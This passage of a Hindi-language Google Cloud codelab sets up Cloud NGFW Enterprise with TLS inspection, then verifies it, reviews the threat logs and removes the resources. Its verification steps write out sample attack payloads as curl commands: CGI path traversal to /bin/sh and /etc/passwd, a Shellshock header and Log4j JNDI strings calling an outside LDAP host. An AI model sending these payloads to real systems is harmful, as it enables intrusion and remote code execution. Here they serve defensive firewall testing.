वीएम टर्मिनल से बाहर निकलें और क्लाउड शेल पर वापस जाएं.
9. टीएलएस की सुरक्षा जांच के लिए फ़ायरवॉल के नियम बनाना और उन्हें अपडेट करना
इससे पहले, हमने फ़ायरवॉल का एक नियम कॉन्फ़िगर किया था. इससे इंटरनल सबनेट से हमारे सर्वर तक इन्ग्रेस ट्रैफ़िक को अनुमति मिलती है. अब हम मौजूदा इनग्रेस नियमों को अपडेट करेंगे और कार्रवाई को apply_security_profile_group पर सेट करेंगे. इससे टीएलएस के साथ E/W L7 की जांच करने की सुविधा चालू हो जाएगी:
gcloud compute network-firewall-policies rules update 800 \
--action=apply_security_profile_group \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--security-profile-group=//networksecurity.googleapis.com/organizations/$org_id/locations/global/securityProfileGroups/$prefix-spg \
--tls-inspect
टीएलएस के साथ नॉर्थबाउंड L7 की जांच करने के लिए, एक नया नियम बनाएं.
gcloud compute network-firewall-policies rules create 900 \
--description "Inspect egress traffic over TCP 443" \
--action=apply_security_profile_group \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--direction=EGRESS \
--enable-logging \
--layer4-configs tcp:443 \
--dest-ip-ranges=0.0.0.0/0 \
--target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-client \
--security-profile-group=/networksecurity.googleapis.com/organizations/$org_id/locations/global/securityProfileGroups/$prefix-spg \
--tls-inspect
डबल जांच को रोकने के लिए, E/W के लिए EGRESS की अनुमति देने वाला एक नया नियम बनाएं.
gcloud compute network-firewall-policies rules create 850 \
--description "Prevent double inspection" \
--action=ALLOW \
--firewall-policy=$prefix-fwpolicy \
--global-firewall-policy \
--direction=EGRESS \
--layer4-configs tcp:443 \
--dest-ip-ranges=10.0.0.0/24 \
--target-secure-tags $project_id/$prefix-vpc-tags/$prefix-vpc-client
10. नॉर्थबाउंड टीएलएस की जांच की पुष्टि करना
क्लाइंट वीएम टैब पर वापस जाएं या फिर से कनेक्ट करें:
gcloud compute ssh $prefix-$zone-client --tunnel-through-iap --zone $zone
हमले के सैंपल को इंटरनेट डेस्टिनेशन पर भेजें:
curl https://www.eicar.org/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; uname -a' --max-time 2
curl https://www.eicar.org/cgi-bin/user.sh -H 'FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a' --max-time 2
curl https://www.eicar.org/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd --max-time 2
curl -H 'User-Agent: ${jndi:ldap://123.123.123.123:8055/a}' https://www.eicar.org --max-time 2
curl -H 'User-Agent: ${jndi:ldap://123.123.123.123:8081/a}' https://www.eicar.org --max-time 2
यहां दिए गए अनुमानित आउटपुट के मुताबिक कोई जवाब नहीं मिला है. इससे पुष्टि होती है कि अब सैंपल के तौर पर किए गए हमलों को ब्लॉक किया जा रहा है:
curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104
वैरिएबल को पहले वाले सर्वर आईपी पर सेट करें:
export target_privateip=[INTERNAL_IP_OF_WWW_SERVER]
सर्वर को TLS के सैंपल अनुरोध भेजें:
curl https://$target_privateip --max-time 2
अनुमानित आउटपुट:
curl: (60) SSL certificate problem: self signed certificate More details here: https://curl.se/docs/sslcerts.html curl failed to verify the legitimacy of the server and therefore could not establish a secure connection to it. To learn more about this situation and how to fix it, please visit the web page mentioned above.
यह अनुरोध क्यों पूरा नहीं किया जा सका? ऐसा इसलिए होता है, क्योंकि फ़ायरवॉल को सर्वर से ऐसा सर्टिफ़िकेट मिल रहा है जिस पर भरोसा नहीं किया जा सकता. ऐसा होने पर, यह क्लाइंट को खुद के हस्ताक्षर वाला सर्टिफ़िकेट वापस भेज देगा. भरोसेमंद कॉन्फ़िगरेशन के हिस्से के तौर पर, हमें CA सर्टिफ़िकेट जोड़ना होगा, ताकि भरोसेमंद कॉन्फ़िगरेशन को चालू किया जा सके.
Cloud Shell पर वापस जाएं.
11. ट्रस्ट कॉन्फ़िगरेशन कॉन्फ़िगर करना
रूट सीए सर्टिफ़िकेट पाएं और उसे सही फ़ॉर्मैट में वैरिएबल के तौर पर सेट करें.
export NGFW_ROOT_CA=$(gcloud privateca roots describe $prefix-CA-Root --project=$project_id --pool=$prefix-CA-Pool --location=$region --format="value(pemCaCertificates)" | sed 's/^/ /')
भरोसेमंद कॉन्फ़िगरेशन वाली YAML फ़ाइल को कॉन्फ़िगर करें. इस फ़ाइल में, भरोसेमंद संस्था के सर्टिफ़िकेट जैसी जानकारी शामिल होती है:
cat > trust_config.yaml << EOF
name: "$prefix-trust-config"
trustStores:
- trustAnchors:
- pemCertificate: |
${NGFW_ROOT_CA}
EOF
ऊपर दिए गए कमांड में, आपके रूट सीए सर्टिफ़िकेट को ट्रस्ट स्टोर के हिस्से के तौर पर शामिल किया गया है. ऐसा इसलिए, क्योंकि आपके सर्वर सर्टिफ़िकेट पर रूट सीए का हस्ताक्षर किया गया था. इसका मतलब है कि फ़ायरवॉल को ऐसे सभी सर्टिफ़िकेट पर भरोसा होगा जिन्हें आपके रूट CA ने साइन किया है. साथ ही, अगर आपकी टीएलएस नीति में excludePublicCa को false पर सेट किया गया है, तो फ़ायरवॉल को सार्वजनिक CA पर भी भरोसा होगा.
ट्रस्ट कॉन्फ़िगरेशन के कॉन्टेंट की जांच करें.
cat trust_config.yaml
आउटपुट का उदाहरण:
सर्टिफ़िकेट के इंडेंटेशन अलाइनमेंट पर ध्यान दें. यह इस फ़ॉर्मैट में ही होना चाहिए.
name: "ngfw-enterprise-trust-config"
trustStores:
- trustAnchors:
- pemCertificate: |
-----BEGIN CERTIFICATE-----
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRS
-----END CERTIFICATE-----
भरोसेमंद कॉन्फ़िगरेशन इंपोर्ट करें:
gcloud certificate-manager trust-configs import $prefix-trust-config --project=$project_id --location=$region --source=trust_config.yaml
भरोसेमंद कॉन्फ़िगरेशन को शामिल करने के लिए, टीएलएस नीति वाली YAML फ़ाइल को अपडेट करें:
cat > tls_policy.yaml << EOF description: Test tls inspection policy. name: projects/$project_id/locations/$region/tlsInspectionPolicies/$prefix-tls-policy caPool: projects/$project_id/locations/$region/caPools/$prefix-CA-Pool excludePublicCaSet: false minTlsVersion: TLS_1_1 tlsFeatureProfile: PROFILE_COMPATIBLE trustConfig: projects/$project_id/locations/$region/trustConfigs/$prefix-trust-config EOF
अपडेट की गई टीएलएस नीति इंपोर्ट करें:
gcloud network-security tls-inspection-policies import $prefix-tls-policy --project=$project_id --location=$region --source=tls_policy.yaml
12. ई/डब्ल्यू टीएलएस की जांच की पुष्टि करना
भरोसेमंद कॉन्फ़िगरेशन को अपडेट करने के बाद, E/W ट्रैफ़िक की जांच करने के लिए, क्लाइंट पर वापस SSH करें:
gcloud compute ssh $prefix-$zone-client --tunnel-through-iap --zone $zone
सर्वर पर TLS अनुरोध का सैंपल चलाएं:
curl https://$target_privateip --max-time 2
अगर आपको अब भी नीचे दिया गया आउटपुट मिलता है, तो कृपया अपडेट लागू होने तक इंतज़ार करें.
curl: (60) SSL certificate problem: self signed certificate More details here: https://curl.se/docs/sslcerts.html curl failed to verify the legitimacy of the server and therefore could not establish a secure connection to it. To learn more about this situation and how to fix it, please visit the web page mentioned above.
अनुमानित आउटपुट:
Page on ngfw-enterprise-us-west1-b-www in network ngfw-enterprise-vpc zone $zone
सर्वर पर नुकसान पहुंचाने वाला टेस्ट ट्रैफ़िक भेजें:
curl https://$target_privateip/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; uname -a' --max-time 2
curl https://$target_privateip/cgi-bin/user.sh -H 'FakeHeader:() { :; }; echo Content-Type: text/html; echo ; /bin/uname -a' --max-time 2
curl https://$target_privateip/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd --max-time 2
curl -H 'User-Agent: ${jndi:ldap://123.123.123.123:8055/a}' https://$target_privateip --max-time 2
curl -H 'User-Agent: ${jndi:ldap://123.123.123.123:8081/a}' https://$target_privateip --max-time 2
अनुमानित आउटपुट:
curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104 curl: (56) OpenSSL SSL_read: Connection reset by peer, errno 104
नीचे दिए गए अनुमानित आउटपुट के मुताबिक, कोई जवाब नहीं मिला है. इससे पुष्टि होती है कि अब ई/डब्ल्यू के लिए, सैंपल के तौर पर किए गए हमलों को ब्लॉक किया जा रहा है.
13. लॉग इन हो रहा है
Cloud Console में जाकर, Logging > Logs Explorer पर जाएं. इसके बाद, नीचे दिया गया फ़िल्टर डालें और लॉग के बारे में क्वेरी करें. [PROJECT_ID] की जगह अपना project_id डालें:
logName="projects/[PROJECT_ID]/logs/networksecurity.googleapis.com%2Ffirewall_threat"
Cloud NGFW Enterprise की लॉग एंट्री, यहां दी गई जानकारी के मुताबिक दिखनी चाहिए:
लॉग एंट्री को बड़ा करें और ध्यान दें कि क्लाइंट वीएम से सर्वर पर भेजे गए हमलों की पहचान कर ली गई है और उन्हें ब्लॉक कर दिया गया है. नीचे दिए गए स्क्रीनशॉट के मुताबिक, यह Apache Log4j रिमोट कोड एक्ज़ीक्यूशन की जोखिम वाली स्थिति है.
आपने Cloud NGFW Enterprise को टीएलएस की जांच करने की सुविधा के साथ डिप्लॉय किया है, ताकि नुकसान पहुंचाने वाले अनुरोधों को ब्लॉक किया जा सके.
डेटा को हटाने के तरीके के बारे में जानने के लिए, अगले सेक्शन पर जाएं.
14. क्लीन-अप करने का तरीका
बुनियादी सेटअप को हटाना
उदाहरण हटाएं:
gcloud -q compute instances delete $prefix-$zone-www --zone=$zone gcloud -q compute instances delete $prefix-$zone-client --zone=$zone
अगर tagAdmin और tagUsers की भूमिकाएं बदल दी गई हैं, तो यह तरीका अपनाएं:
export user_id=$(gcloud auth list --format="value(account)") gcloud organizations remove-iam-policy-binding $org_id \ --member user:$user_id --role roles/resourcemanager.tagAdmin gcloud organizations remove-iam-policy-binding $org_id \ --member user:$user_id --role roles/resourcemanager.tagUser
टैग की और वैल्यू हटाएं:
gcloud -q resource-manager tags values delete $project_id/$prefix-vpc-tags/$prefix-vpc-client gcloud -q resource-manager tags values delete $project_id/$prefix-vpc-tags/$prefix-vpc-server gcloud -q resource-manager tags keys delete $project_id/$prefix-vpc-tags
Cloud Firewall की नेटवर्क नीति और उससे जुड़े असोसिएशन को हटाएं:
gcloud -q compute network-firewall-policies associations delete \
--firewall-policy $prefix-fwpolicy \
--name $prefix-fwpolicy-association \
--global-firewall-policy
gcloud -q compute network-firewall-policies delete $prefix-fwpolicy --global
Cloud Router और Cloud NAT को मिटाएं:
gcloud -q compute routers nats delete $prefix-cloudnat-$region \ --router=$prefix-cr --router-region $region gcloud -q compute routers delete $prefix-cr --region=$region
आरक्षित किए गए आईपी पते मिटाएं:
gcloud -q compute addresses delete $prefix-$region-cloudnatip --region=$region
Cloud Firewall SPG, Association, and TLS Clean-Up
सुरक्षा प्रोफ़ाइल ग्रुप और थ्रेट प्रोफ़ाइल को इस क्रम में मिटाएं:
gcloud -q network-security security-profile-groups delete \ $prefix-spg \ --organization $org_id \ --location=global gcloud -q network-security security-profiles threat-prevention \ delete $prefix-sp-threat \ --organization $org_id \ --location=global
Cloud Firewall एंडपॉइंट का असोसिएशन मिटाने के लिए:
gcloud -q network-security firewall-endpoint-associations delete \ $prefix-association --zone $zone
Cloud Firewall एंडपॉइंट को मिटाएं. इसमें करीब 20 मिनट लग सकते हैं:
gcloud -q network-security firewall-endpoints delete $prefix-$zone --zone=$zone --organization $org_id
ज़रूरी नहीं: नीचे दिए गए निर्देश को चलाकर पुष्टि करें कि Cloud NGFW एंडपॉइंट मिटा दिया गया है:
gcloud network-security firewall-endpoints list --zone $zone \ --organization $org_id
एंडपॉइंट के लिए राज्य की जानकारी में यह दिखना चाहिए:
STATE: DELETING
प्रोसेस पूरी होने के बाद, एंडपॉइंट की जानकारी नहीं दिखेगी.
इस क्रम में टीएलएस नीति और ट्रस्ट कॉन्फ़िगरेशन मिटाएं:
gcloud -q network-security tls-inspection-policies delete \ $prefix-tls-policy \ --location=$region gcloud -q alpha certificate-manager trust-configs delete \ $prefix-trust-config \ --location=$region
रूट सीए और सीए पूल को बंद करें और मिटाएं:
gcloud -q privateca roots disable $prefix-CA-Root \ --location=$region \ --pool=$prefix-CA-Pool \ --ignore-dependent-resources gcloud -q privateca roots delete $prefix-CA-Root \ --location=$region \ --pool=$prefix-CA-Pool \ --skip-grace-period \ --ignore-active-certificates \ --ignore-dependent-resources gcloud -q privateca pools delete $prefix-CA-Pool \ --location=$region \ --ignore-dependent-resources
सबनेट और वीपीसी को हटाना
आखिर में, सबनेट और वीपीसी नेटवर्क मिटाएं:
gcloud -q compute networks subnets delete $prefix-$region-subnet --region $region gcloud -q compute networks delete $prefix-vpc
15. बधाई हो!
बधाई हो, आपने East-West और Northbound TLS Inspection के लिए Cloud NGFW Enterprise कोडलैब को पूरा कर लिया है.